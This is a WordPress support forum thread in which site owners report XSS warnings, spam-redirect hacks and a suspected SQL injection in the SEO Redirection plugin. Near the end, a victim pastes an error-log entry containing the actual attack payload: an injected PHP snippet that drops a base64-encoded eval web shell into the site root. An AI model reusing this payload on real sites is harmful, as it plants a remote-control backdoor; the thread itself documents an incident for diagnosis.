Title: Vulnerability Found
Last modified: August 30, 2016

---

# Vulnerability Found

 *  Resolved [daveteeee](https://wordpress.org/support/users/daveteeee/)
 * (@daveteeee)
 * [10 years, 11 months ago](https://wordpress.org/support/topic/vulnerability-found/)
 * I am getting this report “Vulnerability found: SEO Redirection <= 2.2 – Unauthenticated
   Stored Cross-Site Scripting (XSS)”
 * from plugin security scanner plugin. Should I be concerned?
 * [https://wordpress.org/plugins/seo-redirection/](https://wordpress.org/plugins/seo-redirection/)

Viewing 8 replies - 1 through 8 (of 8 total)

 *  [Fakhri Alsadi](https://wordpress.org/support/users/fakhris/)
 * (@fakhris)
 * [10 years, 11 months ago](https://wordpress.org/support/topic/vulnerability-found/#post-6321495)
 * I tested the plugin and displayed to me the same message, but there is no XSS
   in the plugin, ignore this message, I will try to change the parameters name 
   or the tag name to stop this message from being appeared.
 *  [studioexcel](https://wordpress.org/support/users/studioexcel/)
 * (@studioexcel)
 * [10 years, 9 months ago](https://wordpress.org/support/topic/vulnerability-found/#post-6321858)
 * Hi Fakhri,
    First of all – great plugin. Came in handy many times. However one
   of my websites got hacked (sort of) recently. Weirdly the file system was clean
   but as I started digging it turned out that the SEO_404_links table was full 
   of spammy links to some drug websites. As a result Google picked up dozens of
   non-existent PDF’s which were in reality redirects to some dodgy websites. I 
   truncated the tables and removed the plugin (which solved the issue but still
   a long way before Google removes the “hacked” flag from search results) but the
   situation could indicated that there is indeed a vulnerability that allows such
   hacks. I’d be happy to open a dialog with you about this potential issue.
 *  [Fakhri Alsadi](https://wordpress.org/support/users/fakhris/)
 * (@fakhris)
 * [10 years, 9 months ago](https://wordpress.org/support/topic/vulnerability-found/#post-6321860)
 * please contact me at [http://www.clogica.com/contact-us](http://www.clogica.com/contact-us)
   and send a screenshot of these link to address the issue!
 *  [adithya.bhat](https://wordpress.org/support/users/adithyabhat/)
 * (@adithyabhat)
 * [10 years, 8 months ago](https://wordpress.org/support/topic/vulnerability-found/#post-6321871)
 * Hi Fakhri,
 * Good day!
 * I have installed this plugin in one of my site and it got hacked around 3 weeks
   back and Google displayed “This site might have been hacked” message in the search
   results. With great difficulty we removed that message from Google search results.
   But our site got hacked again yesterday, So we did a investigation on this using
   some tools and we found a vulnerability in the plugin. Please see the below message
   displayed on the tool which we are using.
 * > XSS Vulnerability in SEO Redirection Plugin
 * Continuing further investigation we also found that malicious javascript code
   can be injected by anyone. Can you please look into this and let us know if any
   of this is true?
 * > SEO Redirection Plugin is vulnerable to stored XSS. On the “Settings > SEO 
   > Redirection > Redirection History” screen the referer link is not filtered.
   > Malicious javascript code can be injected by anyone.
 * Thank you for your time. Have a nice day.
 *  [Fakhri Alsadi](https://wordpress.org/support/users/fakhris/)
 * (@fakhris)
 * [10 years, 8 months ago](https://wordpress.org/support/topic/vulnerability-found/#post-6321872)
 * Hi,
 * I will check this issue and solve it soon.
 * Thank you
 *  [yellows12](https://wordpress.org/support/users/yellows12/)
 * (@yellows12)
 * [10 years, 1 month ago](https://wordpress.org/support/topic/vulnerability-found/#post-6321885)
 * Hi Fakhri,
 * One of my websites was recently hacked and my web developer tells me this was
   due to an sql injection on your plugin.
 * Can you confirm this?
 * Thanks,
 * Simon
 *  [the_specialist2005](https://wordpress.org/support/users/the_specialist2005/)
 * (@the_specialist2005)
 * [9 years, 11 months ago](https://wordpress.org/support/topic/vulnerability-found/#post-6321887)
 * My site was hacked. in the error log i found this line:
 * > [16-Jun-2016 04:48:21 UTC] WordPress database error You have an error in your
   > SQL syntax;
   >  check the manual that corresponds to your MySQL server version
   > for the right syntax to use near ‘>|’; file_put_contents($_SERVER[‘DOCUMENT_ROOT’].’/
   > webconfig.txt.php’,base64_deco’ at line 1 for query select * from cbhac_WP_SEO_Redirection
   > where enabled=1 and regex=” and (redirect_from=’/?1=@ini_set(“display_errors”,”
   > 0″); @set_time_limit(0); @set_magic_quotes_runtime(0);
   > echo ‘->|’;
   > file_put_contents($_SERVER[‘DOCUMENT_ROOT’].’/webconfig.txt.php’,base64_decode(‘
   > PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+’));
   >  echo ‘|<-‘;’
   > or redirect_from=’/?1=@ini_set(“display_errors”,”0″);
   > @set_time_limit(0);@set_magic_quotes_runtime(0);
   > echo ‘->|’;
   > file_put_contents($_SERVER[‘DOCUMENT_ROOT’].’/webconfig.txt.php’,base64_decode(‘
   > PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+’));
   >  echo ‘|<-‘;/’ ) made by require(‘wp-blog-
   > header.php’), wp, WP->main, do_action_ref_array, call_user_func_array, WPSR_redirect,
   > W3_Db->query, W3_DbCache->query, W3_DbCallUnderlying->query, W3_Db->query, 
   > W3_DbProcessor->query, W3_Db->default_query
 *  [esmi](https://wordpress.org/support/users/esmi/)
 * (@esmi)
 * [9 years, 11 months ago](https://wordpress.org/support/topic/vulnerability-found/#post-6321888)
 * **[@the_specialist2005](https://wordpress.org/support/users/the_specialist2005/)**:
   This is not your topic. If you require assistance then, as per the [Forum Welcome](https://codex.wordpress.org/Forum_Welcome#Where_To_Post),
   please post your own topic.

Viewing 8 replies - 1 through 8 (of 8 total)

The topic ‘Vulnerability Found’ is closed to new replies.

 * ![](https://ps.w.org/seo-redirection/assets/icon-128x128.jpg?rev=983735)
 * [SEO Redirection Plugin - 301 Redirect Manager](https://wordpress.org/plugins/seo-redirection/)
 * [Frequently Asked Questions](https://wordpress.org/plugins/seo-redirection/#faq)
 * [Support Threads](https://wordpress.org/support/plugin/seo-redirection/)
 * [Active Topics](https://wordpress.org/support/plugin/seo-redirection/active/)
 * [Unresolved Topics](https://wordpress.org/support/plugin/seo-redirection/unresolved/)
 * [Reviews](https://wordpress.org/support/plugin/seo-redirection/reviews/)

 * 8 replies
 * 7 participants
 * Last reply from: [esmi](https://wordpress.org/support/users/esmi/)
 * Last activity: [9 years, 11 months ago](https://wordpress.org/support/topic/vulnerability-found/#post-6321888)
 * Status: resolved